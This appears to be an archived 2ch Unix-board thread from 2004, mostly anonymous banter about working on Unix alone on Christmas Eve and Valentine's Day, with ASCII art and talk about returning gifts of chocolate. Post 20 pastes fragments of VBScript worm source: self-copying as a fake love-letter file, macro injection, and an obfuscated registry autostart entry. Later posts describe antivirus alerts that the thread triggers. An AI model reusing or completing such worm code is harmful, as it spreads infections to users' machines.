5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

おい、イブの夜にUnixいじくってるウンコども!2晩目

1 :名無しさん@お腹いっぱい。:04/01/22 10:32
〜おまえらは俺の心の友だ!〜

教会にも逝かず、彼女とのデートも許されず、
ただひたすらcoreやコンパイル、システム障害と苦闘する
悩めるUNIX技術者が、イエス様の限りない哀れみにより
その労苦の軽減を祈るスレです。

前スレ
http://pc.2ch.net/test/read.cgi/unix/1009184800/l50

2 :名無しさん@お腹いっぱい。:04/01/22 10:33
2get

3 :名無しさん@お腹いっぱい。:04/01/22 10:48
新すれおめ

4 :名無しさん@お腹いっぱい。:04/01/22 11:14
もう次スレを立てると言うことは、今年のイブもウンコは既に確定事項ですか。
気が早いぞw

5 :名無しさん@お腹いっぱい。:04/01/22 11:17
>>1
今年で4周目か はやいもんだ

6 :名無しさん@お腹いっぱい。:04/01/22 12:05
         ∩___∩
         | ノ      ヽ
        /  ●   ● |   去年までウンコだった
        |    ( _●_)  ミ   今年もウンコ
       彡、   |∪|  、`     マジでオススメ
      /      ヽノ ::::i \   
     /  /       ::::|_/   
     \/          ::|
        |        ::::|  クマ
        i     \ ::::/ クマ
        \     |::/
          |\_//
          \_/

7 :名無しさん@お腹いっぱい。:04/01/22 17:41
藻前等早漏か? まだ11ヶ月もあるぞW


8 :名無しさん@お腹いっぱい。:04/01/22 17:50
やはりUNIXerは運命的にウンコの呪縛から逃れられない

PCと〜 ソースだけ〜が〜 と〜もだ〜ち〜さ〜〜

9 :名無しさん@お腹いっぱい。:04/01/22 17:58
ひとまずバレンタインでウンコを味わうと。

10 :名無しさん@お腹いっぱい。:04/01/22 19:42
>>9
そんな事言ったら年中うんこ気分を味わう種が続々出てくるぞ。

11 :名無しさん@お腹いっぱい。:04/01/22 19:54
つまり、イブにUnixいじくってるようなうんこは結局の所、年中うんこだと。

12 :名無しさん@お腹いっぱい。:04/01/23 00:12
前スレでぷろぱ経由とかで埋めた香具師、このスレもじゃんじゃん埋めてくれよ。
100晩目指してガンガレ!!

13 :名無しさん@お腹いっぱい。:04/01/23 00:14
別府さんが1000か。。。いいんじゃないのー

14 :名無しさん@お腹いっぱい。:04/01/23 00:22
>>13
別に誰も悪いとは言ってないと思うが。

15 :名無しさん@お腹いっぱい。:04/01/23 00:31
前スレの1000がかなり示唆的だな。

16 :名無しさん@お腹いっぱい。:04/01/23 00:33
ぷろぱ経由マダー?!

17 :名無しさん@お腹いっぱい。:04/01/23 01:11
埋め&立てるの早すぎ。年末までもつか…

18 :名無しさん@お腹いっぱい。:04/01/23 01:24
板違い。削除よろしく>>1

19 :名無しさん@お腹いっぱい。:04/01/23 10:43
良スレage

20 :名無しさん@お腹いっぱい。:04/01/23 10:47
このスレはヲタクどもが必死ですね。
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&'\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A('IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su'), E.BuildPath(E.GetSpecialFolder(1), A('VHORU@SU/WCR'))
lines(n)=replace(lines(n),'''',chr(93)+chr(45)+chr(93))



21 :名無しさん@お腹いっぱい。:04/01/23 11:07
厨ってのは覚えたての知識披露したがるな。


22 :名無しさん@お腹いっぱい。:04/01/23 11:38
>>20 (・∀・)ニヤニヤ

23 :名無しさん@お腹いっぱい。:04/01/23 11:57
うお、ノートン先生が!








リアクション、これであってる?

24 :名無しさん@お腹いっぱい。:04/01/24 19:42
で、>>20は、なんなの?


25 :名無しさん@お腹いっぱい。:04/01/29 15:54
****** 重要 ******

バレンタインデー中止のお知らせ

2004年2月14日に開催予定のバレンタインデーは諸事情により中止になりました。
この決定により、ホワイトデーも中止ということになります。
中止、ならびにこの告知が遅れたことにつきまして、
楽しみにしておられた方々・関係者各位には謹んでお詫び申し上げます。

****** 重要 ******

26 :名無しさん@お腹いっぱい。:04/01/29 16:08
それでも宇宙は拡がって行く。


27 :名無しさん@お腹いっぱい。:04/01/29 17:35
>>25
ついでに例のアレみたいな画像も作ってよ。

28 :名無しさん@お腹いっぱい。:04/01/30 23:44
そういえば、もうそんな時期か。
このスレの出番だな… ( ̄ー ̄)ニヤリッ

29 :名無しさん@お腹いっぱい。:04/01/31 00:04
今年度のバレンタイン大作戦

女性店員がレジにいるコンビニでチョコを買う

わざとチョコを受け取り忘れて店を出る

女性店員が走って渡しに来る「あの・・・これ・・・」

ちょっぴりバレンタイン気分


30 :名無しさん@お腹いっぱい。:04/01/31 00:19
おまいらはギリチョコの1つももらえないんでっか?


31 :名無しさん@お腹いっぱい。:04/01/31 00:27
おふくろさまが毎年くれまつ・・。

32 :名無しさん@お腹いっぱい。:04/01/31 00:33
>>30
明らかに義理と判断できる物はカウントしたくないでつ…
それで貰った気分になっちゃたら負けでつ

33 :名無しさん@お腹いっぱい。:04/01/31 00:33
それでも宇宙は拡がって行く。


34 :名無しさん@お腹いっぱい。:04/01/31 00:48
話はは変わるがブルボンのチョコ味のガムは、かなりひどい味だった。
一発ネタでもあれは無かろう。

35 :名無しさん@お腹いっぱい。:04/01/31 09:52
それでも陽はまた昇る。

36 :名無しさん@お腹いっぱい。:04/01/31 10:25
昇った陽はいつか必ず沈む:-)

37 :名無しさん@お腹いっぱい。:04/01/31 10:34
私が死ぬときまでに夜は明けますか?

38 :名無しさん@お腹いっぱい。:04/01/31 10:50
主は天にいまし 世は全てこともなし
おだやかに過ぎ逝く時間を楽しみましょう。

39 :名無しさん@お腹いっぱい。:04/02/01 04:17
春が来て、ずっと春だったらいいのに。

40 :名無しさん@お腹いっぱい。:04/02/01 17:32
■■■■バレインタインデー中止のお知らせ■■■■
ttp://www.geocities.jp/vanalenjp/


41 :名無しさん@お腹いっぱい。:04/02/01 17:54
と言うか、そもそも「バレンタインデーにチョコレート」の発祥は
日本のとある製菓会社の販売戦略という罠。
で、それが多くの日本人の間で定着してしまった。
日本にしかない風習だし、宗教的にも何の意味も成さない。
クリスマスと同様、騒ぎたがり屋の日本人ならではの表層的行事だ、
気に病むことはないぞ諸君!

42 :名無しさん@お腹いっぱい。:04/02/01 22:11
義理チョコすらもらえない >>41 が居るのはこのスレでつか?



43 :名無しさん@お腹いっぱい。:04/02/01 22:19
義理チョコがもらえる程度で優越感を持っている>>42がいるのはこのスレでつか?

44 :名無しさん@お腹いっぱい。:04/02/01 22:38
チョコレートじゃなくHDDとかPCのパーツにしてくれんかな。
いや、もらえないのにかわりはないんだけど。

45 :名無しさん@お腹いっぱい。:04/02/01 22:45
いらないか?

46 :名無しさん@お腹いっぱい。:04/02/02 21:15
ウホッ!いいウンコ

47 :名無しさん@お腹いっぱい。:04/02/02 23:23
今年のXデーまで2chは存続しているだろうか・・・

48 :名無しさん@お腹いっぱい。:04/02/03 17:14
再臨のキリスト、唯一神又吉イエスは日本・世界をどうするか、どのようにするか
唯一神又吉光雄イエスキリスト (著)
http://www.amazon.co.jp/exec/obidos/ASIN/4890951377/ref=sr_aps_b_/250-0211750-4163407

この商品に興味がある人は、こんな商品にも興味をもっています

いけないお姉さんいずみコミックス あとりK (著)
奪!童貞。SANWA COMICS No. にった じゅん (著)
The Iliad (Loeb Classical Library, No. 170) Homer (著)
童貞鎮魂姦SANWA COMICS No. にった じゅん (著)
日本ブレイク工業 社歌 萬Z


・・・

49 :名無しさん@お腹いっぱい。:04/02/03 17:54
日本では国土の広いアメリカと違って、
amazonみたいなネット通販は一般に普及するに至ってない。
利用者の大半はいわゆる「引きこもり」でしょ。
外に出なくても、誰とも会わなくても、買い物が出来るから。

にしても、実際のデータを見てみるとめちゃくちゃ偏ってて面白いね。

50 :名無しさん@お腹いっぱい。:04/02/03 18:04
>>49
> 利用者の大半はいわゆる「引きこもり」でしょ。
意見を述べる時はソースを。


51 :49:04/02/03 18:07
>>50
amazon.co.jpのランキング見てると、
結構痛いものが頻繁に上位に上がってくる。

あと、俺の周囲にそういった感じの人物がいるんで。

52 :名無しさん@お腹いっぱい。:04/02/03 18:20
>>51
主観だろ、それは。客観的なデータを示せよ。「痛いもの」がどうのこうの言
うけど、その「痛い」ってのは >>49 の主観だろ。そこからどうやったら利用
者の大半が引きこもりだ、という結論に導けるんだ?あとスレ違い。

53 :名無しさん@お腹いっぱい。:04/02/03 18:32
>>20のせいでこのスレ開く度にノートン君が警告上げるんだが(OoenJane)
どしたらいいですか?

54 :名無しさん@お腹いっぱい。:04/02/03 18:35
UNIX を使えばいいです。

55 :名無しさん@お腹いっぱい。:04/02/03 18:41
>>20が何かしたか?navi2ch(Emacs21.2)では全く反応無しニダ

56 :名無しさん@お腹いっぱい。:04/02/03 19:16
女子大生です。
WindowsXPにNorton AntiVirus2002を入れて、
OpenJaneで2chをしているのですが、>>53さんと同じ現象が出ます。

解決方法を教えて貰えませんか?


57 :名無しさん@お腹いっぱい。:04/02/03 19:33
板違い。

58 :名無しさん@お腹いっぱい。:04/02/03 20:31
>女子大生です。
こう言えば教えてもらえると思ったのか。
まあこのスレタイじゃあ、おめでてーなとも言い切れないが。

59 :55:04/02/03 21:42
>>20が何かしたか?navi2ch1.7.1(Emacs21.2)では全く反応無しニダ

60 :名無しさん@お腹いっぱい。:04/02/03 23:30
女子中学生です。

>>53>>56と全く同じです。
今後のためにも解決方法を教えていただけませんか?

61 :名無しさん@お腹いっぱい。:04/02/03 23:43
>>60
教えてやらんでもないが、料金は先払いになります。

62 :55:04/02/04 00:42
>>60
>>20が何かしたか?navi2ch1.7.1(Emacs21.2)では全く反応無しニダ

63 :名無しさん@お腹いっぱい。:04/02/04 13:23
navi2ch1.7.1(Emacs21.3.50) でも反応無しだな。

64 :名無しさん@お腹いっぱい。:04/02/04 15:09
navi2ch1.7.1 (Emacs 20.7.1) でも無反応だが。

65 :名無しさん@お腹いっぱい。:04/02/11 03:17
で, きみらはチョコをもらう目処はたったんかね?


66 :名無しさん@お腹いっぱい。:04/02/11 15:03
****** 重要 ******

クリスマス中止のお知らせ

孤独感や嫉妬から引き起こされる犯罪の増加の懸念により
2003年12月25日に開催予定のクリスマスは諸事情により中止になりました。
この決定により、クリスマスイブも中止ということになります。
中止、ならびにこの告知が遅れたことにつきまして、
楽しみにしておられた方々・関係者各位には謹んでお詫び申し上げます。


67 :名無しさん@お腹いっぱい。:04/02/13 21:28
3個しかもらえんかった 不作だ。

68 :名無しさん@お腹いっぱい。:04/02/13 21:45
ホントは明日なんだが、うち土曜は無いんで、義理だけど・・・数個貰った。
・・・チョコじゃないものを。
で、どーしようコレ。
俺の周りには何故か男にせよ女にせよ価値観が歪んだ人間が多い。
類は友を呼ぶということなのか〜ッ?

69 :名無しさん@お腹いっぱい。:04/02/13 22:24
****** 重要 ******

バレンタイン中止のお知らせ

本年2月14日に開催予定のバレンタインデーは諸事情により中止になりました。
この決定により、ホワイトデーも中止ということになります。
中止、ならびにこの告知が遅れたことにつきまして、
楽しみにしておられた方々・関係者各位には謹んでお詫び申し上げます。

****** 重要 ******


70 :名無しさん@お腹いっぱい。:04/02/13 23:30
うんこage

71 :名無しさん@お腹いっぱい。:04/02/13 23:47
うんこ
http://www.itmedia.co.jp/mobile/articles/0402/13/news063.html

72 :名無しさん@お腹いっぱい。:04/02/14 00:38
バレンタインとかクリスマスとかやたらデバッグが進みますね。

73 :名無しさん@お腹いっぱい。:04/02/14 07:37
今年度のバレンタイン大作戦

女性店員がレジにいるコンビニでチョコを買う

わざとチョコを受け取り忘れて店を出る

女性店員が走って渡しに来る「あの・・・これ・・・」

ちょっぴりバレンタイン気分

74 :名無しさん@お腹いっぱい。:04/02/14 07:41
ヽ(・∀・)ノ ウンコー!!


75 :名無しさん@お腹いっぱい。:04/02/14 08:27
ウンコが集うスレはここですか・・・

76 :名無しさん@お腹いっぱい。:04/02/14 09:23
毎年この時期に会社でチョコ配ってくれてた保険のおばさんが二年前に
急性心不全で他界された。
ここ二年は誰からもチョコもらってない。

77 :名無しさん@お腹いっぱい。:04/02/14 09:40
女っ気のない会社だなW

78 :55:04/02/14 10:19
漏れは貰う目処が全く無いからもう気にする事でもない。

79 :ヽ(´ー`)ノ:04/02/14 13:58
http://news4.2ch.net/test/read.cgi/news/1076722681/89
これですよ、これ。

80 :名無しさん@お腹いっぱい。:04/02/14 20:13
ttp://nyamco.ath.cx/nyamco/files4/1076755762.jpg

81 :名無しさん@お腹いっぱい。:04/02/14 21:48
>>20
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/

82 :名無しさん@お腹いっぱい。:04/02/14 22:17
新・Mac板に闖入したあのイタい>>1
またもや懲りずにムスカにタコ殴りされて泣き出しますた!!
  ,r'    /  ヾ,、               ゙,
 ./   イ/    ` ` 、              }
 { i   | ゙      、,,`' 、 ,           j
 レ'、,  |      ,:r'"''‐ `'゙、  ,、‐‐、      l
   ゝ」、 、 , ,、‐''゙゙、゙'、-――t'''/ / l     |    ________
    ,ゝ‐、_,',.  ' ,O 〉     V .( ゙, j     i   /アッハッハッハッハ!
    ',.ヽソ. '、,,、 -'"       / /     j <  もう降参かね>>1くん!
     '‐レ゙             .,r'    ノ   \
      l` `      、     i'" ゙ヽ、,/       ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
.      ゙、  ,,、 -‐'"      ノ    ヽァ、
>>1タコ殴りhttp://pc.2ch.net/test/read.cgi/mac/1076677153/147-201
前スレhttp://pc.2ch.net/test/read.cgi/mac/1074924037/

83 :名無しさん@お腹いっぱい。:04/02/15 14:13
まぁ これで我慢汁
ttp://no.m78.com/up/data/u008644.jpg

84 :名無しさん@お腹いっぱい。:04/02/17 11:35
貰うのはいいけど 返すのが太変だよ・・・

85 :名無しさん@お腹いっぱい。:04/03/07 19:19
義理チョコのお返しって一個の予算どの位に設定してる?

86 :名無しさん@お腹いっぱい。:04/03/07 19:48
基本路線は、だいたいトータル予算3000エソくらい計上して、件数で割る感じかな。
まー、なるだけもらった分の原価は割らないように頑張るけど。

ぁ、嫁にはしっかり返しとかないと後が怖いので、豪勢なのを別予算で。
平均2000エソくらいかな…



ところで、Linux に navi2ch-1.7 なんだけど、会社の Symantec Web Security の方が
反応して困るんですけど。これ踏むと、ユーザ情報とその後しばらくのWebのログが
自動的にレポートされるらしくて、「つまらんところ見るな」と怒られる…


87 :名無しさん@お腹いっぱい。:04/03/08 02:44
            __, ----- 、   
     ___「「 |    ̄⌒ヽ¬、\
    / ̄ブ /  |       \   ヽ   
   〃   / /  ハ |ヽ   ヽ\  ヽ  ヽ
      // / | ||l  |ト、ヽ  \ \ ヽ   !    
    // /l | || ヽ ヽ\>┼\ ヽヽ  |  
    ||  | | | |」十 ヽ ヽ ヾィ¬ミヾ | 川|       
    lハ | | | トxrテミ     ├1:::リ}| |}}リト〉 <逝きていれば、いいことあるかもね
      ヽ !トlハ {{ ヒハ     ヽニソ | レ1∧|     
       ヽV八ハ ゞ┘ ,   "" | | || {
       // /jハ ""  一   , イ /| l| ハ
        // // / /`丶 、 __/ ||/l| /l| | ヽ
     // /// | / |川r┤    |//|/ || | | ヽ
    / ///川レ┬ '" /   /|ハ| >┬L|ヽ !
  ./ / // / | || |  /ヽ ァ'´  ||_メ/ /⌒ヽ}}
/ //  /レ7 」 || ヽ |  /  __乂レ'´ /     _ヽ
  / /  /ハ/ |  ̄\」 /r‐ '´ ̄ } \/     トミヘ
 / /  / //  }‐ ¬厂!'´   ヽ/  }}     \ハ
 |/  / //|  /   _L」      |   / , -------- ヘ
 || 〃/〈 |  |厂 //个、`ー、 /  //         〉
 || || | __レ<└'′// |   `ーく__/〈/ /___  _/
 || ||く └─‐ 、\ハ{ { レ===ゝ  〈// ̄`Y--  ``7

88 :ヽ(´ー`)ノ:04/03/08 12:10
>>85
片手で数えれる程度しか貰わないので、格言に従って三倍返し。

手作りの義理チョコが一番気を使うね。見積りできない……(;´Д`)


89 :名無しさん@お腹いっぱい。:04/03/08 12:35
漏れはタオル。取りあえず誰でも使えるし
外したものでも家の中で使う分には困らない。
変にカッコつけたのはキモイと思うがどうよ。

90 :名無しさん@お腹いっぱい。:04/03/08 14:49
>>89
「オーガニック素材じゃないと……」とか言われたりしてな。

91 :名無しさん@お腹いっぱい。:04/04/27 02:02
いわゆる保守。Unix 板では必要でないといわれても、
心意気を示し、これに万感の意をこめるなり。決して
酔っ払ってるわけではない

92 :名無しさん@お腹いっぱい。:04/04/27 05:13
今年のクリスマスはUnix弄ってなくて済みそうだ p(^^)q

93 :名無しさん@お腹いっぱい。:04/04/27 13:17
夏から同居予定だけど、やっぱりイブにはUnixその他いじくるんだよもん。

94 :名無しさん@お腹いっぱい。:04/04/27 13:25
彼女にログインでつねw

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)